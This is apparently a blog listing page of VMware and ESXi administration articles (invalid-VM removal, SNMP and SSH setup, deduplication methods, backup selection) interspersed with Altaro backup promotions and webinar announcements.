vmware workstation pro VMware Workstation Pro - Click to enlarge

VMware Workstation is essentially an application installed on top of Windows which lets you run connected or isolated Virtual Machines. It’s best suited for developers who need access and control to deploy and test code, or for systems administrators looking to test applications on the latest version of a particular operating system, of which over 200 are supported in Workstation Player and Pro.

We’ve already explained that Workstation Player is the free version of Workstation Pro, but when it comes to functional differences we’ve detailed those for you below:

vmware player workstation pro feature comparison

VMware Workstation Player and Pro both get installed onto your Windows PC or laptop, on which you can run your virtual machines. Pro is interesting because you can run as many Virtual Machines as your Windows PC or laptop hardware can handle, making it a great bit of software for running live product demonstrations or testing without needing access to remote infrastructure managed by another team. The key element here is to ensure your laptop or PC has enough resources available (CPU/cores, RAM and HDD space) for the Virtual Machines that will be running on it.

Diving into some of the features that VMware Workstation Pro provides shows how much value for money the software offers. Being able to take a snapshot of a Virtual Machine is useful so that you can roll it back to a particular date and time in just a few seconds. You can also clone Virtual Machines should you need many copies of the same VM for testing. Encryption is also available in the event that your local Virtual Machines contain sensitive information.

VMware Workstation Pro is, therefore, something of a mini ESXi: it’s not capable of clustering features, but it is an extremely cost-effective way (approximately $300 USD) to make use of some of the unused resources on your Windows machine.

Summary

In summary here are our definitions for everything covered in this article:

  • vSphere: vSphere is a naming convention or “brand” for a selection of VMware Infrastructure solutions including vCenter Server, ESXi, vSphere Replication and Update Manager.
  • vCenter Server: vCenter Server is one of the solutions under the vSphere suite. It is used to manage multiple ESXi servers and enables cluster-level and high-availability features for ESXi servers and Virtual Machines. vCenter Server is generally purchased when paid versions of ESXi have been deployed.
  • Workstation Player: Workstation Player is free software by VMware that lets you run one Virtual Machine at a time within your Windows Operating System.
  • Workstation Pro: Workstation Pro is the same as Workstation Player but it requires a paid license which enables enterprise features such as the ability to run many Virtual Machines from your Windows PC or Laptop. Features such as Virtual Machine snapshots, cloning and encryption are also supported with Pro.
  • ESXi: ESXi is the enterprise-grade solution for running Virtual Machines in the datacentre. It is installed onto bare metal servers. There is a basic free version, suitable for labs and test environments but the paid versions are more suitable for running mission-critical virtual machines and applications for your business, enabling cluster level features such as High Availability.

5 Most Critical Microsoft M365 Vulnerabilities Revealed and How to Fix Them - Free Webinar

Microsoft 365 is an incredibly powerful software suite for businesses, but it is becoming increasingly targeted by people trying to steal your data. The good news is that there are plenty of ways admins can fight back and safeguard their Microsoft 365 infrastructure against attack.

5 Most Critical Microsoft M365 Vulnerabilities and How to Fix Them

This free upcoming webinar, on June 23 and produced by Hornetsecurity/Altaro, features two enterprise security experts from the leading security consultancy Treusec - Security Team Leader Fabio Viggiani and Principal Cyber Security Advisor Hasain Alshakarti. They will explain the 5 most critical vulnerabilities in your M365 environment and what you can do to mitigate the risks they pose. To help attendees fully understand the situation, a series of live demonstrations will be performed to reveal the threats and their solutions covering:

  • O365 Credential Phishing
  • Insufficient or Incorrectly Configured MFA Settings
  • Malicious Application Registrations
  • External Forwarding and Business Email Compromise Attacks
  • Insecure AD Synchronization in Hybrid Environments

This is truly an unmissable event for all Microsoft 365 admins!

The webinar will be presented live twice on June 23 to enable as many people as possible to join the event live and ask questions directly to the expert panel of presenters. It will be presented at 2pm CEST/8am EDT/5am PDT and 7pm CEST/1pm EDT/10am PDT.

 


The Backup Bible. A Free Complete Guide to Disaster Recovery, Onsite - AWS & Azure Cloud Backup Strategies. Best Backup Practices

onprem and cloud backup

The Free Backup Bible Complete Edition, written by backup expert and Microsoft MVP Eric Siron, comprises 200+ pages of actionable content divided into 3 core parts, including 11 customizable templates enabling you to create your own personalized on-prem and cloud-based (AWS, Azure) backup strategy.

Part 1 and 2 are updated versions of previously released eBooks (Creating a Backup & Disaster Recovery Strategy and Backup Best Practices in Action) but Part 3 is a brand-new section on disaster recovery (Disaster Recovery & Business Continuity Blueprint) that includes tons of valuable insights into the process of gathering organizational information required to build a DR plan and how to carry it out in practical terms.

The Backup Bible is offered Free and is available for download here.

Let’s take a look at what’s covered:

The Backup Bible – Part 1: Fundamentals of Backup

Part 1 covers the fundamentals of backup and tactics that will help you understand your unique backup requirements. You'll learn how to:

  • Begin your backup and disaster recovery planning
  • Set recovery objectives and loss tolerances
  • Translate your business plan into a technically oriented outlook
  • Create a customized agenda for obtaining key stakeholder support
  • Set up a critical backup checklist

The Backup Bible – Part 2: Selecting your Backup Strategy

Part 2 shows you what an exceptional backup looks like on a daily basis and the steps you need to get there, including:

  • Choosing the Right Backup and Recovery Software
  • Setting and Achieving Backup Storage Targets
  • Securing and Protecting Backup Data
  • Defining Backup Schedules
  • Monitoring, Testing, and Maintaining Systems

Access both parts for free now and ensure you’re properly protecting your vital data today!

The Backup Bible – Part 3: Aligning Disaster Recovery Strategies to your Business Needs

Part 3 guides you through the process of creating a reliable disaster recovery strategy based on your own business continuity requirements, covering:

  • Understanding key disaster recovery considerations
  • Mapping out your organizational composition
  • Replication
  • Cloud solutions
  • Testing the efficacy of your strategy

the backup bible

One of the most useful features of The Backup Bible is the customizable templates and lists that enable the reader to put the theory into practice. These are found in the appendix but are linked in the text at the end of each relevant chapter. If you are going to read this book cover to cover it would be a good idea to fill out the templates and lists as you go through it, so by the time you’ve finished reading you’ll have a fully personalized backup action plan ready for you to carry out!

Sure, it’s not the most exciting aspect of an IT administrator’s job but having a reliable and secure backup and disaster recovery strategy could be the most important thing you do. I’m sure you’ve heard many data loss horror stories that have crippled organizations costing thousands, if not millions, of dollars. This free eBook from Altaro will make sure you’re not the next horror story victim.

Summary

The Backup Bible Complete Edition also works as a great reference guide for all IT admins and anyone with an interest in protecting organizational data. And the best thing of all: it’s free! Learn how to create your own backup and disaster recovery plan, protect and secure your data backup for both onsite/on-premises and cloud-based (AWS and Azure) installations plus more. What are you waiting for? Download your copy now!


SysAdmin Day 2020 - Get your Free Amazon Voucher & Gifts Now!

sysadmin day 2020 amazon voucher

SysAdmin Day has arrived, and with it, gratitude for all the unsung heroes that 2020 has needed. Your hard work has made it possible for all of us to keep going, despite all the challenges thrown our way. Now it is Altaro’s turn to thank YOU.

If you are an Office 365, Hyper-V or VMware user, celebrate with Altaro. Just sign up for a 30-day free trial of either Altaro VM Backup or Altaro Office 365 Backup – it's your choice!

sysadmin day 2020 altaro
What can you Win?

  • Receive a €/£/$20 Amazon voucher when you use your trial of Altaro Office 365 Backup or Altaro VM Backup.
  • Get the chance to also win one of their Grand Prizes by sharing your greatest 2020 victory with Altaro in a video of up to 60 seconds.

What are you waiting for? Sign up now!


How to Fix VMware ESXi Virtual Machine 'Invalid Status'

In this article, we'll show you how to deal with VMs which are reported to have an Invalid Status, as shown in the screenshot below. This is a common problem many VMware and System Administrators are faced with when dealing with VMs. We'll show you how to enable SSH on ESXi (required for this task), use the vim-cmd command to obtain a list of the invalid VMs, use the vim-cmd /vmsvc/unregister command to unregister (delete) the VMs, and edit the /etc/vmware/hostd/vmInventory.xml file to remove the section(s) that reference the invalid VM(s).

The Invalid Status issue is usually caused after attempting to delete a VM, manually removing VM files after a vMotion, a problem with the VMFS storage, or even after physically removing the storage from the ESXi host, e.g. replacing a failed HDD.

esxi vm machine invalid status

Another difficulty with VMs stuck in an Invalid Status is that VMware will not allow you to remove or delete any Datastore associated with the VM, e.g. if you wanted to remove an HDD. For safety reasons, you must first remove or migrate the affected VM so that there is no VM associated with the Datastore before VMware allows you to delete it.

Concerned about your VM machines and their data? Download now your Free Enterprise-grade VM Backup solution


The screenshot below shows ESXi failing to delete datastore 256G-SSD - which is used by VM FCX-ISE1 above, now reported to be in an Invalid Status:

esxi vm unable to delete datastore

As most System Administrators discover in these situations, they are pretty much stuck: the only way to remove the VM, now marked as 'Invalid', is to delete it, as the Unregister option cannot be selected when right-clicking on the VM:

esxi vm invalid status delete unregister option unavailable

Notice in the screenshot above how the Unregister or Delete menu options are not available.

The only method to delete this VM is to use the SSH console on the ESXi host and execute a number of commands. This requires SSH to be enabled on the ESXi host.

Read our quick guide on “How to enable SSH on an ESXi host” if SSH is not enabled on your ESXi host.

Once SSH is enabled, connect to your ESXi host with any SSH client, such as PuTTY, using your ESXi root credentials, then use the vim-cmd command with the following parameters to obtain a list of the invalid VMs:

[root@esxi1:~] vim-cmd vmsvc/getallvms | grep invalid
Skipping invalid VM '8'
[root@esxi1:~]

From the command output it is apparent that VM No. 8 is the one we are after. As a last attempt, we can try to reload the VM in the hope that it will rectify the problem, by executing the vim-cmd vmsvc/reload command:

[root@esxi1:~] vim-cmd vmsvc/reload 8
(vmodl.fault.SystemError) {
   faultCause = (vmodl.MethodFault) null,
   faultMessage = <unset>,
   reason = "Invalid fault"
   msg = "Received SOAP response fault from [<cs p:03d09848, TCP:localhost:80>]: reload
vim.fault.InvalidState"
}

Unfortunately, no joy. We now need to proceed to unregister/delete the VM using the vim-cmd /vmsvc/unregister command as shown below:

[root@esxi1:~] vim-cmd /vmsvc/unregister 8

Once the command is executed, the invalid VM will magically disappear from the ESXi GUI interface:

esxi vm machine invalid vm deleted
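You can also confirm the result from the same SSH session; re-running the earlier query should now return no invalid VMs (expected output, based on the host used in this example):

[root@esxi1:~] vim-cmd vmsvc/getallvms | grep invalid
[root@esxi1:~]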

Another way to delete the VM is to edit the /etc/vmware/hostd/vmInventory.xml file and remove the section that references the invalid VM. In the snippet below, we need to remove the ConfigEntry block that references the invalid VM (objID 8):

<ConfigRoot>
  <ConfigEntry id="0000">
    <objID>1</objID>
    <secDomain>23</secDomain>
    <vmxCfgPath>/vmfs/volumes/5a87661c-a465347a-a344-180373f17d5a/Voyager-DC/Voyager-DC.vmx</vmxCfgPath>
  </ConfigEntry>
  …………
  <ConfigEntry id="0008">
    <objID>8</objID>
    <secDomain>54</secDomain>
    <vmxCfgPath>/vmfs/volumes/   </vmxCfgPath>
  </ConfigEntry>

</ConfigRoot>

When finished, simply save the vmInventory.xml file.
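Two practical notes if you edit the inventory file by hand: keep a copy of the original file before making any changes, and restart the host’s management agent afterwards so the ESXi interface picks up the change. A minimal sketch of those steps is shown below (restarting hostd briefly disconnects management clients but does not affect running VMs):

# before editing, keep a copy of the original inventory file
cp /etc/vmware/hostd/vmInventory.xml /etc/vmware/hostd/vmInventory.xml.bak

# after saving your changes, restart the management agent
/etc/init.d/hostd restart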

Summary

This article showed how to deal with an ESXi VM that is in an invalid status. We explained possible causes of this issue, how to enable SSH on ESXi and the SSH commands required to reload or delete the invalid VM. Finally we saw how to delete a VM by executing the vim-cmd /vmsvc/unregister command or editing the vmInventory.xml XML file.


How to Enable SNMP on VMware ESXi Host & Configure ESXi Firewall to Allow or Block Access to the SNMP Service

In this article we will show you how to enable SNMP on your VMware ESXi host, configure the SNMP community string and configure your ESXi firewall to allow or block access to the SNMP service from specific host(s) or network(s).

Enabling the SNMP service on a VMware ESXi host is considered mandatory in any production environment, as it allows a Network Monitoring System (NMS) to access and monitor the ESXi host(s) and obtain valuable information such as CPU, RAM and storage usage, vmnic (network) utilization and much more.

how to enable snmp on esxi host

Furthermore, an enterprise-grade NMS can connect to your VMware infrastructure and provide alerting, performance and statistical analysis reports to help determine sizing requirements, as well as identify bottlenecks and other problems that might be impacting the virtualization environment.

Execution Time: 10 minutes


Concerned about your VM machines and data? Download now your Free Enterprise-grade VM Backup solution

Enable SSH on ESXi

The first step is to enable SSH on ESXi. This can be easily performed via the vSphere client, ESXi console or Web GUI. All these methods are covered in detail in our article How to Enable SSH on VMware ESXi.

Enable and Configure ESXi SNMP Service

Once SSH has been enabled, ssh to your ESXi host and use the following commands to enable and configure the SNMP service:

esxcli system snmp set --communities COMMUNITY_STRING
esxcli system snmp set --enable true

Replace “COMMUNITY_STRING” with the SNMP community string of your choice.
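Before moving on, you can optionally verify the agent’s configuration by querying the current SNMP settings:

esxcli system snmp get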

Enable SNMP on ESXi Firewall

The next step is to add a firewall rule to allow inbound SNMP queries to the ESXi host. There are two scenarios here:

  • Allow traffic from everywhere
  • Allow traffic from specific hosts or networks

Allow SNMP Traffic from Everywhere

The below rules allow SNMP traffic from everywhere – all hosts and networks:

esxcli network firewall ruleset set --ruleset-id snmp --allowed-all true
esxcli network firewall ruleset set --ruleset-id snmp --enabled true

Allow SNMP Traffic from Specific Hosts or Networks

The below rules allow SNMP traffic from host 192.168.5.25 and network 192.168.1.0/24:

esxcli network firewall ruleset set --ruleset-id snmp --allowed-all false
esxcli network firewall ruleset allowedip add --ruleset-id snmp --ip-address 192.168.5.25
esxcli network firewall ruleset allowedip add --ruleset-id snmp --ip-address 192.168.1.0/24
esxcli network firewall ruleset set --ruleset-id snmp --enabled true
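As an optional sanity check, you can list the hosts and networks currently permitted by the snmp ruleset:

esxcli network firewall ruleset allowedip list --ruleset-id snmp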

Block Host or Network from Accessing SNMP Service

To block a previously allowed host or network from accessing the SNMP service simply execute the following command(s):

esxcli network firewall ruleset allowedip remove --ruleset-id snmp --ip-address 192.168.5.25
esxcli network firewall ruleset allowedip remove --ruleset-id snmp --ip-address 192.168.1.0/24

Restart SNMP Service

Now that everything is configured, all we need to do is restart the SNMP service using the following command:

/etc/init.d/snmpd restart
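Once the service is back up, it is worth testing SNMP from the monitoring side. Below is a minimal sketch using the common net-snmp tools from a Linux NMS host; replace ESXI_HOST_IP with your host’s management IP and COMMUNITY_STRING with the community string configured earlier:

# walk the standard system MIB subtree (1.3.6.1.2.1.1) on the ESXi host
snmpwalk -v2c -c COMMUNITY_STRING ESXI_HOST_IP 1.3.6.1.2.1.1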

Summary

In this article we explained the importance and usage of the SNMP Service for VMware ESXi Hosts and vCenter. We explained how to enable the SNMP Service on an ESXi host, configure the SNMP community string (public/private) and provided examples on how to configure the ESXi Firewall to control SNMP access to the ESXi host.


How to Enable or Disable SSH on VMware ESXi via Web GUI, vSphere Web GUI (vCenter), vSphere Client and Shell Console

SSH access to VMware’s ESXi server is disabled by default; however, there are many cases where SSH might be required. VMware and System administrators often need to perform advanced administrative tasks that require SSH access to the ESXi host. For example, deleting or reloading a VM with an Invalid Status can only be performed via SSH.

In this article, we’ll show you how to enable SSH on your ESXi host with just a few simple steps. This task can be achieved via the ESXi Web GUI, the vSphere Web GUI (vCenter), the vSphere client or the ESXi console. We’ll cover all four methods.

Execution Time: 5 minutes

Security Tip: If your ESXi host management IP is not protected or isolated from the rest of the network, it is advisable to enable SSH on an as-needed basis.

Enabling and Disabling SSH Console on VMware ESXi via Web GUI

Log into your ESXi server and select the host from the Navigator window. Next, go to Action > Services and select the Enable Secure Shell (SSH) menu option:

vmware esxi enable ssh

This will immediately enable SSH. To disable SSH, repeat the same steps. You’ll notice that the Disable Secure Shell (SSH) option is now available:

vmware esxi disable ssh

Enabling and Disabling SSH on VMware via vSphere Web GUI Client (vCenter)

For those with a VMware vCenter environment, you can enable SSH for each ESXi host by selecting the host and then going to Manage > Settings > Security Profile > Edit.  In the pop-up window, scroll down to SSH Server and tick it. Optionally enter the IP address or network(s) you require to have SSH access to the host:

vmware esxi enable ssh vsphere web gui

Enabling and Disabling SSH on VMware ESXi via vSphere Client

Launch your vSphere client and log into your ESXi host. From vSphere, click on the ESXi host (1), then select the Configuration tab (2). From there, click on the Security Profile (3) under the Software section. Finally click on Properties:

vmware esxi enable ssh via vsphere client

On the pop-up window, select SSH and click on the Options button:

vmware esxi enable ssh via vsphere client remote access

Select the required Startup Policy. Note that the ‘Start and stop with host’ option will permanently enable SSH. Next, click on the Start button under Service Commands to enable SSH immediately. When done, click on the OK button:

vmware esxi enable ssh via vsphere client start stop

To disable the SSH service via vSphere, follow the same process as above, ensure you select the “Start and stop manually” Startup Policy option and click on the Stop button under the Service Commands section.

Enabling and Disabling SSH Console on VMware ESXi via ESXi Console

From your ESXi console, hit F2 to customise the system:

vmware esxi enable ssh via console

At the prompt, enter the ESXi root user credentials:

vmware esxi enable ssh via console

At the next window, highlight Troubleshooting Options and hit Enter:

vmware esxi enable ssh via console

Next, go down to the Enable SSH option and hit Enter to enable SSH:

vmware esxi enable ssh via console

Notice that ESXi is now reporting that SSH is enabled:

vmware esxi enable ssh via console 5

Now hit Esc to exit the menu and logout from the ESXi host console.
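As a side note, if you already have access to the ESXi Shell (for example via the console’s local shell) or another automation channel, the SSH service can also be toggled from the command line. The commands below are a sketch of that approach and assume you are already at an ESXi Shell prompt:

# enable the SSH service and start it immediately
vim-cmd hostsvc/enable_ssh
vim-cmd hostsvc/start_ssh

# stop and disable it again when no longer needed
vim-cmd hostsvc/stop_ssh
vim-cmd hostsvc/disable_ssh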

Summary

In this article we showed how to enable and disable the SSH service on a VMware ESXi host using the ESXi Web GUI, the vSphere Web GUI (vCenter), the vSphere client and the ESXi console. We explained why the SSH service sometimes needs to be enabled and also noted the security risks of permanently enabling SSH.


World Backup Day with Free Amazon Voucher and Prizes for Everyone!

Celebrate World Backup Day and WIN with Altaro!

We all remember how grateful we were to have backup software when facing so many data loss mishaps and near-catastrophes.

world backup day 2020 - win with altaro

If you manage your company's Office 365 data, celebrate this World Backup Day with Altaro. All you have to do is sign up for a 30-day free trial of Altaro Office 365 Backup. There’s a guaranteed Amazon voucher in it for you, and if you share your biggest backup mishap with them, you get a chance to WIN one of the grand prizes:

  • DJI Mavic Mini Drone FlyCam Quadcopter
  • Google Stadia Premiere Edition
  • Ubiquiti UniFi Dream Machine
  • Logitech MX Master 3 Advanced Wireless Mouse

What are you waiting for? The offer expires on the 22nd of April, so sign up now!

Good luck & happy World Backup Day! 

 


Understanding Deduplication. Complete Guide to Deduplication Methods & Their Impact on Storage and VM Backups

data deduplication process vm backup

When considering your VM backup solution, key features such as deduplication are incredibly important. This is not simply from a cost perspective but also an operational one. While it is true that deduplication of your backup data can deliver considerable cost savings for your business, it is also true that the wrong type of deduplication can hurt performance and contribute to a negative end-user experience.

This article will explore the various deduplication types including general Inline Deduplication and Altaro’s Augmented Inline Deduplication for your VM Backup Storage. We'll also cover deduplication concerns such as software interoperability, disk wear, performance and other important areas.


Concerned about your VM machines and their data? Download now your Free Enterprise-grade VM Backup solution


Deduplication Basics

In fundamental terms, deduplication is the process of minimizing the amount of physical storage required for your data. In this article, we are using your VM backups as the data subject.

While physical storage costs are improving year on year, storage is still a considerable cost for any organization, which is why deduplication techniques are being included in common data handling products such as backup software for your Virtual Machines.

There are various forms of deduplication available and it’s imperative to understand each one as all of them have various cost-saving vs performance trade-offs.

File-Based Deduplication

File-based deduplication was popular in the early days of deduplication; however, this method’s shortcomings became quickly apparent. With this method, files would be examined and checked to ensure identical files wouldn’t be stored a second time. The problem here was that much of a file could be identical to other files despite being named differently and having a different time-stamp. Furthermore, other file-level differences would make the deduplication engine mark the file as unique, forcing the whole file to be backed up.

The end result is a significant amount of data being backed up multiple times, reducing the efficiency of the file-based deduplication engine.
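A quick way to see why file-based deduplication struggles is to compare whole-file checksums, which is essentially what such an engine does. In the hypothetical example below (the file names are made up for illustration), two copies of the same virtual disk that differ by a single appended byte produce completely different hashes, so a file-level engine would store both files in full:

# two copies of the same virtual disk, one with a tiny change appended
cp vm-disk.vmdk vm-disk-copy.vmdk
echo "x" >> vm-disk-copy.vmdk

# the whole-file hashes no longer match, so a file-level engine treats them as unique
md5sum vm-disk.vmdk vm-disk-copy.vmdk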

Block-Level Deduplication

Block-level deduplication is the evolution of file-based deduplication which successfully addresses the shortcomings of its predecessor. With this method, the deduplication engine now examines the raw blocks of data on the filesystems themselves.  By concentrating on the raw blocks of data the deduplication engine no longer worries about the overall file a block is part of and can accurately understand the type of data the raw block contains.

The end result is a very efficient and intelligent deduplication engine that is capable of saving more space on the backup target.

To help better understand the block-level deduplication engine, we’ve included an example of how this process works with Altaro’s VM Backup solution.  Our example consists of 3 VMs and the diagram shows how each VM’s data is broken into different blocks (A to E).

In Phase 1, block-level deduplication is performed across each VM resulting in a significant saving of 110GB of space across all VMs. In Phase 2, block-level deduplication is performed across all VMs achieving an amazing 118GB reduction of storage space!

So far, Altaro’s VM Backup has saved 228GB of storage space which represents an impressive 47% reduction of VM Backup storage! In Phase 3, the deduplicated data is compressed to just 151GB and transferred to the backup storage.

block level deduplication vm backup

As noted in the diagram above, the overall VM backup storage requirement has been reduced from 481GB to just 151GB – representing a 68.8% reduction in size and allowing you to keep more backups using much less storage space.

Download your free copy of Altaro's VM Backup Solution - Free for specific number of physical hosts!

Post-Process Deduplication

Compared to other deduplication options, post-process deduplication is a simpler form. All VM backup data is sent to the target storage device for your backups. After this, on a schedule, a process runs on the backup device to remove duplicated data.

post process deduplication

While this is simple in that no agents are required on your Virtual Machines, your target backup device will need to be large enough to cater for all backup data. Only after the data has landed on the device will you see a reduction in size, hopefully in time for the next day’s worth of backups.

Post-process is also problematic because you might need to enforce a “blackout window”, this being a period of time when you should not perform any backups because the storage device is busy moving data around and running the deduplication process.

The benefit of post-process deduplication though, is that it does deduplicate your data and not only on a per VM or per backup window but it often (depending on the implementation and vendor) will deduplicate across all backed up data. This can have a massive space-saving benefit, but only after the deduplication process has run.

Inline Deduplication

Inline Deduplication is an intelligent form of deduplication because it usually runs deduplication algorithms (processing) as the data is being sent to the target storage device. In some cases, the data is processed before it is sent along the wire.

inline deduplication process

In these scenarios, you can benefit from a target storage device with a lower storage capacity than traditionally required, reducing your backup storage target costs. Depending on the type of data being backed up and the efficiency of the deduplication technology by your vendor, savings can range significantly.

Consider a scenario where you are backing up the same operating system a hundred or more times; deduplication savings would be expected to be quite good.

Since inline deduplication does not run on the target storage device, the performance degradation on the device is typically lower than with other methods. This translates to higher throughput, allowing more backups to run sequentially and your VM backups to complete within scheduled backup windows.

The main benefits of inline deduplication are that your target storage device can have a lower capacity than originally required, additional similar workloads will not add much data to the target, and the storage target’s performance is better than when using other deduplication options. You also benefit from less disk wear, which is a concern for both HDD and SSD drive types.

One of the drawbacks, though, is that depending on the implementation, inline deduplication might not deduplicate your VM job’s data against all data on the target storage array. The implementation could be on a per-VM or per-job basis, resulting in lower deduplication benefits than other methods.

Augmented Inline Deduplication

Augmented in-line deduplication is an implementation of in-line deduplication used by Altaro’s VM backup solution.

In this implementation, variable block sizes are used to maximise deduplication efficiency. This is all achieved with very low memory and CPU requirements, resulting in room for more backups in less space than would be needed without any deduplication in place.

deduplication and compression

Another important consideration here is that less bandwidth is required to ship your VM backup data to the backup storage system. If your backup infrastructure is located in a different building or geographic location, bandwidth can get expensive. Now that data is deduplicated before it is sent across the wire, the bandwidth requirements are reduced significantly.

Altaro’s implementation is impressive because it’s a form of inline deduplication, promising deduplication across all backed up data.

In the graphic below we can see that data is shipped to a central backup target from various Virtual Machines. While this is happening, deduplication processes are running.

vm backup with augmented inline deduplication

The benefits of such a solution are clear;

  • Very Fast backups. There is no storage performance lost as there are no post-processes running on the storage target.
  • Excellent deduplication rates. Deduplication occurs between the source data and ALL data on the backup target. If the data is already in the backup storage device, it will not be copied to the destination storage again, saving space.
  • No operational overhead. There are no agents to install or manage. Installation of the feature is a simple checkbox.
  • No additional SSD or HDD wear on the target. Since there are no post-processes there is no “double touch” of the backed up data. This significantly reduces the wear on HDDs and SSDs resulting in fewer disk failures.

Deduplication Gotchas

If your backup software comes with deduplication as standard, surely there is no reason not to use it? Not quite! You must consider the type of deduplication in use and the overall impact it has on your backup systems.

Software Interoperability

A key consideration when analysing backup solutions is feature interoperability. Some backup vendors will not support deduplication with other features. An example of this is a storage device which runs post-process deduplication combined with backup software that supports instant VM recovery.

Instant VM recovery, direct from the backup target can be a very beneficial feature for your business, however, you must ensure that the vendor supports this feature on deduplicated storage targets (if this is the type of system your business has in place.)

Performance

From a performance perspective, there is no point in having a smart deduplication system if it’s slowing your backups down to the point where you cannot complete them. Be sure to trial deduplication features to correctly assess the performance impact on your platforms. Also ensure that there is little or no impact on production Virtual Machines. We know that post-process deduplication has no effect on production workloads, but it is possible that inline deduplication does, so it should be tested.

A quick way to check performance would be to compare backup times before enabling deduplication features with those afterwards. From here you can perform a cost-saving vs performance analysis to decide which is better for your business.

Disk Wear

Take a look at the SMART data for your disks after enabling deduplication for an extended period of time. If the wear-out time on SSDs is significantly reduced, then consider an inline deduplication feature rather than post-process.
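As a hedged example of how you might check this on a Linux-based backup server using the smartmontools package (the device name /dev/sda and the exact attribute names are assumptions and vary by drive model):

# dump all SMART attributes and look for common SSD wear indicators
smartctl -a /dev/sda | grep -iE "wear|percentage used|media_wearout"

Compare these values over time; a sharp increase after enabling deduplication is a sign the feature is adding significant write amplification.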

Operations

If enabling deduplication means installing, upgrading and generally managing agents everywhere, consider another solution which does not require agents. Agents will also consume CPU and Memory which can negatively impact the end-user experience of your applications.

For post-process deduplication ensure you are not limited to time windows for your backups and restores. Also, check the performance of this feature, especially on large backup targets.

The Impact of Augmented Inline Deduplication for VM backups

Deploying a VM backup solution that uses augmented inline deduplication is a great idea if you have limited space on an existing backup target. It’s also a good fit if you are looking at a more expensive SSD option, but do not want to stretch your IT budget to one that will natively store multiple copies of the same Virtual Machine.

An example of some of the storage savings can be seen in the below graphic:

altaro augmented inline deduplication

Most organizations have multiple Virtual Machines with the same operating system. A typical Windows Server can have around 20GB of data just for the operating system. Consider hundreds of similar VMs with daily backups and long retention policies; the savings can be considerable.
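To put that in perspective with a rough, hypothetical calculation: 100 VMs x 20GB of largely identical operating system data comes to around 2TB per full backup cycle; a deduplication engine that recognises those common blocks only needs to store the bulk of that data once, with each additional VM contributing little more than its unique data.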

Unlike physical machines, VMs do not usually require additional agents for deduplication or backups to run - there are some exceptions of course.

Summary

In this article we covered the basics of deduplication and analyzed File-Based, Block-Level, Post-Process, Inline and Augmented Inline Deduplication. Furthermore, we explained the strengths and weaknesses of each deduplication method and provided examples of how organizations can leverage deduplication for their VM backups to save space and money.

To wrap up, there are almost no reasons why a deduplication-capable VM backup solution should be ignored when choosing your backup platform. There are some caveats depending on your business and technical requirements, but there are several options available to get started with deduplication.

Fortunately, for the most part, Altaro’s Augmented Inline Deduplication features are a good fit for most scenarios and are available at a competitive price point.

Remember, when selecting your VM backup solution, consider the limitations of the various kinds of deduplication and go with what works best for your business.


FREE Webinar - Fast Track your IT Career with VMware Certifications

Everyone who attends the webinar has a chance of winning a VMware VCP course (VMware Install, Config, Manage) worth $4,500!

Climbing the career ladder in the IT industry is usually dependent on one crucial condition: having the right certifications. If you’re not certified to a specified level in a certain technology used by an employer, that’s usually a non-negotiable roadblock to getting a job or even further career progression within a company. Understanding the route you should take, and creating a short, medium, and long term plan for your certification goals is something everyone working in the IT industry must do. In order to do this properly you need the right information and luckily, an upcoming webinar from the guys at Altaro has you covered!

Fast Track your IT Career with VMware Certifications is a free webinar presented by vExperts Andy Syrewicze and Luke Orellana on November 20th, outlining everything you need to know about the VMware certification world including costs, value, certification tracks, preparation, resources, and more.

Free vmware certification webinar

In addition to the great content being discussed, everyone who attends the webinar has a chance of winning a VMware VCP course (VMware Install, Config, Manage) worth $4.5k! This incredible giveaway is open to anyone over the age of 18 and all you need to do to enter is register and attend the webinar on November 20th! The winner will be announced the day after the webinar via email to registrants.

VMware VCP Certification is one of the most widely recognized and valued certifications for technicians and system administrators today however the hefty price tag of $4.5k puts it out of reach of many. The chance to get this course for free does not come along every day and should definitely not be missed!

While the event date has passed, it has been recorded and is available for viewing. All materials are available as direct downloads. Click here to access the event.


6 Key Areas to Consider When Selecting a VM Backup Solution

vm backup considerations

Backup and disaster recovery are core considerations for any business with an IT footprint, whether that is on-premises or in the cloud.

Your business depends on reliable IT systems to support its core functions. Even a short one-hour outage can cause considerable disruption and have a financial impact on the business. Given our ever-growing reliance on IT systems, it is more important than ever to choose the right VM Backup software for your business, to protect your virtual infrastructure (VMware, Hyper-V) and business data in the case of a system failure or security incident, while at the same time providing fast restoration of individual files or folders, server databases or entire VMs.

Using Altaro VM Backup as a case study, this article will guide you through the following six main areas which you should consider when choosing your VM Backup solution:

Analyze Your Business Requirements

The most important part of selecting a backup solution is to ensure that the solution will meet your requirements.

There are various requirements that you might have, a few examples are:

Number of Virtual Machines and Hosts

You need to ensure that the backup software is capable of handling the size of your virtualized estate. So if your total number of VM hosts is very large or changing constantly, then you might want to ensure that the solution is scalable and it is easy to add additional workloads into the platform.

Type of Backup Storage

Most backup solutions for a virtualized environment are software-based, meaning that they run on top of a Windows Server installation or from within their own appliance which you deploy to your virtualized platform. Other options include a physical appliance with storage built in.

If you already have storage infrastructure in place, ensure that your choice of backup solution allows native connectivity to this backup target. If you are looking for a storage device for the backups, consider one which supports simple standards that work over existing networking infrastructure, such as a NAS or an SMB network share.

Specialist Features

Be sure to analyse any existing features that you are using or consider new ones as part of your backup solution selection process.

Some of the features to consider include:

Deduplication

Deduplication of the storage used at the target backup location can significantly reduce the amount of storage that is needed to host your backups. Check with your backup vendor what the average deduplication rates are and ensure you check any small print that is attached to any claims.

When we look at deduplication from Altaro’s perspective, they rightfully boast how they can outperform even their closest competitors. With Altaro, you can back up 858GB of VM data into only 390GB of space. Imagine the backup storage cost savings there:

augmented inline deduplication example

Try Altaro's Free VM Backup Solution - Download Now

WAN Optimisation

If you are backing up your Virtual Machines to a secondary site over a WAN connection, then consider a solution which includes WAN Optimisation. Bandwidth isn’t free, which is where WAN optimisation can help: backup data is compressed before it crosses the link.

In some better implementations, only data that the backup storage doesn’t already have will be sent over the WAN. This can drastically save your bandwidth and avoid “burst” costs by your ISP. WAN Optimization can also free up the link for other uses and applications.

Guest Quiescing

If you have databases which require backing up, then ensure your selected solution supports backing up your database type and version. In this scenario it is not enough to back up the Virtual Machines on their own. Typically for databases, an agent needs to be deployed to the machine, which will instruct the database to flush all writes that are in memory to disk. If you don’t do this, there is a risk that the database will not restore correctly. Something to keep in mind is that with Altaro, Exchange, SQL and other applications only require VMware Tools (in a VMware vSphere environment) for guest quiescing. No additional agents are required.

vm backup - guest quiescing

Instant Restore

Instant restore is a more modern approach to restoring Virtual Machines. Some providers will allow you to instantly map the backup file to your systems so that you can get back online in seconds rather than waiting for several hours for a restore to complete.

